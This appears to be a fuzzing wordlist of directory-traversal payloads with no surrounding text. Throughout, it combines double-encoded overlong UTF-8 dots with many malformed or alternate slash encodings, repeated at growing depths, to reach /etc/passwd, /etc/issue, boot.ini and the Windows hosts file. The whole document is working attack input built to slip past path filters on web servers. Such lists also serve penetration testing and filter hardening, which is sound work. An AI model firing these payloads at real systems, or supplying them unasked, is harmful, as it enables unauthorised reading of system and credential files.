-%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pcetc%c1%pcissue -%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pcboot.ini -%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pcetc%c1%pcpasswd -%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pcetc%c1%pcissue -%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pcboot.ini -%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%25c0%25ae%25c0%25ae%c0%9vetc%c0%9vpasswd -%25c0%25ae%25c0%25ae%c0%9vetc%c0%9vissue -%25c0%25ae%25c0%25ae%c0%9vboot.ini -%25c0%25ae%25c0%25ae%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9vetc%c0%9vpasswd -%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9vetc%c0%9vissue -%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9vboot.ini -%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9vetc%c0%9vpasswd -%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9vetc%c0%9vissue -%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9vboot.ini -%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9vetc%c0%9vpasswd -%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9vetc%c0%9vissue -%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9vboot.ini -%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9vetc%c0%9vpasswd -%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9vetc%c0%9vissue -%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9vboot.ini -%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9vetc%c0%9vpasswd -%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9vetc%c0%9vissue -%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9vboot.ini -%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9v%25c0%25ae%25c0%25ae%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%25c0%25ae%25c0%25ae%c0%qfetc%c0%qfpasswd -%25c0%25ae%25c0%25ae%c0%qfetc%c0%qfissue -%25c0%25ae%25c0%25ae%c0%qfboot.ini -%25c0%25ae%25c0%25ae%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qfetc%c0%qfpasswd -%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qfetc%c0%qfissue -%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qfboot.ini -%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qfetc%c0%qfpasswd -%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qfetc%c0%qfissue -%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qfboot.ini -%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qfetc%c0%qfpasswd -%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qfetc%c0%qfissue -%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qfboot.ini -%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qfetc%c0%qfpasswd -%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qfetc%c0%qfissue -%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qfboot.ini -%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qfetc%c0%qfpasswd -%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qfetc%c0%qfissue -%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qfboot.ini -%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qf%25c0%25ae%25c0%25ae%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%25c0%25ae%25c0%25ae%c1%8setc%c1%8spasswd -%25c0%25ae%25c0%25ae%c1%8setc%c1%8sissue -%25c0%25ae%25c0%25ae%c1%8sboot.ini -%25c0%25ae%25c0%25ae%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8setc%c1%8spasswd -%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8setc%c1%8sissue -%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8sboot.ini -%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8setc%c1%8spasswd -%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8setc%c1%8sissue -%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8sboot.ini -%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8setc%c1%8spasswd -%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8setc%c1%8sissue -%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8sboot.ini -%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8setc%c1%8spasswd -%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8setc%c1%8sissue -%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8sboot.ini -%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8setc%c1%8spasswd -%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8setc%c1%8sissue -%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8sboot.ini -%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8s%25c0%25ae%25c0%25ae%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%25c0%25ae%25c0%25ae%c1%1cetc%c1%1cpasswd -%25c0%25ae%25c0%25ae%c1%1cetc%c1%1cissue -%25c0%25ae%25c0%25ae%c1%1cboot.ini -%25c0%25ae%25c0%25ae%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1cetc%c1%1cpasswd -%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1cetc%c1%1cissue -%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1cboot.ini -%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1cetc%c1%1cpasswd -%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1cetc%c1%1cissue -%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1cboot.ini -%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1cetc%c1%1cpasswd -%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1cetc%c1%1cissue -%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1cboot.ini -%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1cetc%c1%1cpasswd -%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1cetc%c1%1cissue -%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1cboot.ini -%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1cetc%c1%1cpasswd -%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1cetc%c1%1cissue -%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1cboot.ini -%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1c%25c0%25ae%25c0%25ae%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%25c0%25ae%25c0%25ae%c1%afetc%c1%afpasswd -%25c0%25ae%25c0%25ae%c1%afetc%c1%afissue -%25c0%25ae%25c0%25ae%c1%afboot.ini -%25c0%25ae%25c0%25ae%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%afetc%c1%afpasswd -%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%afetc%c1%afissue -%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%afboot.ini -%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%afetc%c1%afpasswd -%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%afetc%c1%afissue -%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%afboot.ini -%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%afetc%c1%afpasswd -%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%afetc%c1%afissue -%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%afboot.ini -%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%afetc%c1%afpasswd -%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%afetc%c1%afissue -%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%afboot.ini -%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%afetc%c1%afpasswd -%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%afetc%c1%afissue -%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%afboot.ini -%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%af%25c0%25ae%25c0%25ae%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%25c0%25ae%25c0%25ae%bg%qfetc%bg%qfpasswd -%25c0%25ae%25c0%25ae%bg%qfetc%bg%qfissue -%25c0%25ae%25c0%25ae%bg%qfboot.ini -%25c0%25ae%25c0%25ae%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qfetc%bg%qfpasswd -%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qfetc%bg%qfissue -%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qfboot.ini -%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qfetc%bg%qfpasswd -%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qfetc%bg%qfissue -%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qfboot.ini -%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qfetc%bg%qfpasswd -%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qfetc%bg%qfissue -%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qfboot.ini -%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qfetc%bg%qfpasswd -%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qfetc%bg%qfissue -%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qfboot.ini -%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qfetc%bg%qfpasswd -%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qfetc%bg%qfissue -%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qfboot.ini -%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qf%25c0%25ae%25c0%25ae%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%25c0%25ae%25c0%25ae%u2215etc%u2215passwd -%25c0%25ae%25c0%25ae%u2215etc%u2215issue -%25c0%25ae%25c0%25ae%u2215boot.ini -%25c0%25ae%25c0%25ae%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215etc%u2215passwd -%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215etc%u2215issue -%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215boot.ini -%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215etc%u2215passwd -%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215etc%u2215issue 